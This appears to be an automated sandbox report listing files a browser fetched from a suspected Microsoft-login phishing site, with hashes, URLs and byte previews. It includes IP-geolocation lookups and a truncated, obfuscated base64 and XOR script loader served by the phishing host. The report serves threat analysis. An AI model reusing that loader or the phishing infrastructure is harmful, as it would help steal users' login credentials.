                                                              Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                              Category:downloaded
                                                              Size (bytes):35970
                                                              Entropy (8bit):7.989503040923577
                                                              Encrypted:false
                                                              SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                              MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                              SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                              SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                              SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47
                                                              Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):727
                                                              Entropy (8bit):7.573165690842521
                                                              Encrypted:false
                                                              SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                              MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                              SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                              SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                              SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140
                                                              Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):763
                                                              Entropy (8bit):4.73890517681664
                                                              Encrypted:false
                                                              SSDEEP:12:f8+MHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrE2AptAv9VVZ8BHA:k+mx14wxHoaNO38mV5r2ZmrE2sAv9OBg
                                                              MD5:3849201717DD51D96B654574CCED466A
                                                              SHA1:E24F74FECAB382E723EDA00292AA9EC36DC35EC0
                                                              SHA-256:842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
                                                              SHA-512:3153B3DC36715F41F7181E6F332EB4E7CBC60348C7025BE9AC5853FD175E8C72C941CA093D222B9F5AE8D56CDE0A913186FAAEB186E30258AF71F0492EB5DF89
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:{. "ip": "8.46.123.33",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):104
                                                              Entropy (8bit):4.840199122155243
                                                              Encrypted:false
                                                              SSDEEP:3:CaSbcCNT3EKVEkxhZJSh3EkEkki3kx+BR0:PSbzqKVEkxzQDw+R0
                                                              MD5:021197253B2562210B461059E9AD2DF3
                                                              SHA1:179ECE63910591822F738E8E999028C969C4A832
                                                              SHA-256:29B65BE90398DCE2A43CFB41EF2A4B0E08FACAE58215B1A03DD454D590B16EC9
                                                              SHA-512:512E85D9FB36BE2C9189A3B575A57CECB73FB3B33839CCBF8D56064872C8CD93BBFE9B371A696AEA3E0C325A64DCBEEA2974BFB751576376D158012F9982CA9C
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwl0weJS6QH8nRIFDV9X_g0SBQ0TmyRjEjMJ88_Fjm2Dv18SBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43Q=?alt=proto
                                                              Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKNgoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 79 x 26, 8-bit/color RGB, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):61
                                                              Entropy (8bit):4.035372245524405
                                                              Encrypted:false
                                                              SSDEEP:3:yionv//thPl6lt/GwU/6yxl/k4E08up:6v/lhPWut7Tp
                                                              MD5:5971D9CF0BF237BEFAB32D2ED5822527
                                                              SHA1:E778F9CF67DBA3AA352D69BA263B9D2C234DEA2E
                                                              SHA-256:A32010BFC8FCC727DCEF23104D12A4B8C1B5978D828AA096EB0C986F5E22AD19
                                                              SHA-512:A094C1E693DD191BA1F311A4E7978377DFC6ECFB32004741ADEF8A358B586B92999FED5F70E81C67DD34AC281ED784FD7FE72DF567B1B4F05D4044DAEE33A0BD
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX
                                                              Preview:.PNG........IHDR...O.........y.......IDAT.....$.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):61
                                                              Entropy (8bit):3.990210155325004
                                                              Encrypted:false
                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):727
                                                              Entropy (8bit):7.573165690842521
                                                              Encrypted:false
                                                              SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                              MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                              SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                              SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                              SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):30
                                                              Entropy (8bit):3.939572261986723
                                                              Encrypted:false
                                                              SSDEEP:3:pW9uXMRgvn:pWMXD
                                                              MD5:9ABF99E9F4E068283E232A2F3A978BD8
                                                              SHA1:739A42442ED8C00B7E743CCB27B4CE57CC8BC478
                                                              SHA-256:755ABF6E78956DFE1A010A086E287F712B051C2DB2D57ABC47632DDC58CCA607
                                                              SHA-512:48E029D481A173882AE839AA86E1C7FAC52F06019E64E5537AEDC128B36212368FB0B7D2B810781752A62635D8145C39AA2878F014BDC69FF8A0173FA1F504E9
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:{. "origin": "8.46.123.33".}.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, height=1987, bps=182, compression=LZW, PhotometricIntepretation=CMYK, orientation=upper-left, width=3579], baseline, precision 8, 1920x1066, components 3
                                                              Category:downloaded
                                                              Size (bytes):290799
                                                              Entropy (8bit):7.922187397264848
                                                              Encrypted:false
                                                              SSDEEP:6144:8Rmsv1pF1LB8kniKes9YNy/FnW5sfFY538IEvm8P2YUFcybnYM0aXJ:8Lyknijs9E0isfm5Eu8P2nFcybnSgJ
                                                              MD5:A9D9B1AA463974CFAB7C2253553852F1
                                                              SHA1:06D9BF34AA776506420CB8FA9E26B522281725FE
                                                              SHA-256:794C5FB600D060BD0B30BB54F10CEF9AFD4718F600DE2DB9E2D2472BF4AE906B
                                                              SHA-512:251200FA21EE687862347CE576FEB89B106AE48E34928766D63017A436D5F6275D0AEA752F4B16393A7FB57D67E1A14F6F9550E21F6054136F88F1F16FD844E2
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391
                                                              Preview:......JFIF.....,.,......Exif..II*...............................................................................................................................(...........1...........2...........i...........,.............,.......,.......Adobe Photoshop CS3 Windows.2017:07:21 10:36:18...................................*...............................z...............(.......................................H.......H.............JFIF.....,.,.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......Y....".......................................A.........................!1A..Q"2aq.B..#345Rrs.....Cb......6DS................................&........................!1"2.#3AqQa.............?.m.r.....8.......0..1..C.<b...I...(........h$.T..D..qQ6.<...OJa.$.3.qG.ZO..4l...85D.........aU...B.A......^.( w.G.|%7.5=.tv...(.......Y5..w...|......... V...4....O..A5.,.)s..6.....t. ..S....N.{.o...@Q..V....b.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (23398), with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):23398
                                                              Entropy (8bit):5.104409455331282
                                                              Encrypted:false
                                                              SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                                                              MD5:C1C51D30D5E7094136F2D828349E520F
                                                              SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                              SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                              SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720
                                                              Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                              Category:downloaded
                                                              Size (bytes):1812
                                                              Entropy (8bit):6.046260469991838
                                                              Encrypted:false
                                                              SSDEEP:48:7IHwPLw+YBsYJZ2jCQE3wbuHxSbg7rrDuomo3pLn:IeIJZ2ejgbIqIDuo/V
                                                              MD5:E00EA21256F32BFA2D324EFB236BD2BE
                                                              SHA1:EDB7E04169CA9CB2C686ACE51C44A9172674AA11
                                                              SHA-256:7B9DF9BD79ACCED005B36E6EA3871710E8A21FD7184B6ECBE4917DB19C090D14
                                                              SHA-512:323950984EDD4ED17F009A8DEB6E74E58D7A7733081AAB227FF2199CD93AD72974ABD58ECFEF7EBC5C1F586091DAE8CE92077DAA334DCADA3D701693638BFE07
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/2DUx/
                                                              Preview:<script>..function dEVaJwpQwd(ytYoKgTcuO, GVhOzoWYHu) {..let gylFOoRtMl = '';..ytYoKgTcuO = atob(ytYoKgTcuO);..let ReTNNCLHXP = GVhOzoWYHu.length;..for (let i = 0; i < ytYoKgTcuO.length; i++) {.. gylFOoRtMl += String.fromCharCode(ytYoKgTcuO.charCodeAt(i) ^ GVhOzoWYHu.charCodeAt(i % ReTNNCLHXP));..}..return gylFOoRtMl;..}..var yVNWlDBgbv = dEVaJwpQwd(`XkxqGjYGDSAffV5MIAgnVCc+PxARJTouER1EbUs0OigyBiJaCD8IIicvOQd7HAUjA20gMzQaIQZMYUJ4XkwwHDsXEDkELXMTIgMsJDYWJxU4bgAhDxghNi0ONCt/SS55bnBLY3MyJBB1D2laS2NzZnZJdVQWNR82ISh2CyEbBXgKNzwkfj8dLggVDQUeITtAfFRZbUsVGxw6LDMyKTcGeF5Mdkl1VBlwCCInJT5JfREWIkJjKEtcSXVURHBLY3M0Mx0gBgpwDSI/NTNSWH5EcEtjLktcFFh+DTZDAD0SBSs2GCMUAmNue3ZLd10fXWFjc2Z2HjwaAD8cbT8pNQghHQs+RSshIzBJaFQTOQUnPDF4BToXBSQCLD1oJgghHAoxBiZzbXZLalZEe0thBGRtZF8JaVoCJXsFOD0GNgc8LAc6ZndUaFRGckI4Xkx2SXVUDTZLawYyPBAFJiIcPSh7BTg9BjYHPCwHOm9/SS55bnBLY3MwNxt1OwMCHzYUMhURGFRZcAo3PCR+KjsgNxIILxQCP0BueW5wS2NzMDcbdR0zOic0FjM3IjNUWXBDDDQUIhwSACcoJm0+JyIKPVxLeDAfJGh7NH40PzFGORJrDFl4TUp9NmgPaA0IeA4lfTFzfn8L
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:dropped
                                                              Size (bytes):1864
                                                              Entropy (8bit):5.222032823730197
                                                              Encrypted:false
                                                              SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JSON data
                                                              Category:downloaded
                                                              Size (bytes):763
                                                              Entropy (8bit):4.73890517681664
                                                              Encrypted:false
                                                              SSDEEP:12:f8+MHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrE2AptAv9VVZ8BHA:k+mx14wxHoaNO38mV5r2ZmrE2sAv9OBg
                                                              MD5:3849201717DD51D96B654574CCED466A
                                                              SHA1:E24F74FECAB382E723EDA00292AA9EC36DC35EC0
                                                              SHA-256:842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
                                                              SHA-512:3153B3DC36715F41F7181E6F332EB4E7CBC60348C7025BE9AC5853FD175E8C72C941CA093D222B9F5AE8D56CDE0A913186FAAEB186E30258AF71F0492EB5DF89
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://ipapi.co/8.46.123.33/json/
                                                              Preview:{. "ip": "8.46.123.33",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (10017)
                                                              Category:downloaded
                                                              Size (bytes):10245
                                                              Entropy (8bit):5.437589264532084
                                                              Encrypted:false
                                                              SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                              MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                              SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                              SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                              SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                              Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):49602
                                                              Entropy (8bit):7.881935507115631
                                                              Encrypted:false
                                                              SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                              MD5:DB783743CD246FF4D77F4A3694285989
                                                              SHA1:B9466716904457641B7831868B47162D8D378D41
                                                              SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                              SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210
                                                              Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                              Category:downloaded
                                                              Size (bytes):93276
                                                              Entropy (8bit):7.997636438159837
                                                              Encrypted:true
                                                              SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                              MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                              SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                              SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                              SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92
